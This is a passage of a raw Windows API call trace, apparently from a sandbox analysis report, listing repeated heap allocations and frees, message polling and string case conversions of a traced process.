hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0265.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0265.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0265.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0265.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0265.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0265.827] CharLowerBuffW (in: lpsz="byte[55496]", cchLength=0xb | out: lpsz="byte[55496]") returned 0xb [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c8) returned 0x2f3ea70 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0265.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0265.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0265.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c0) returned 0xe50048 [0265.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c0) returned 0xe5d910 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d910 | out: hHeap=0x970000) returned 1 [0265.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0265.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.833] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0265.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c0) returned 0xe50048 [0265.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0265.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0265.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0265.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.839] RtlAllocateHeap 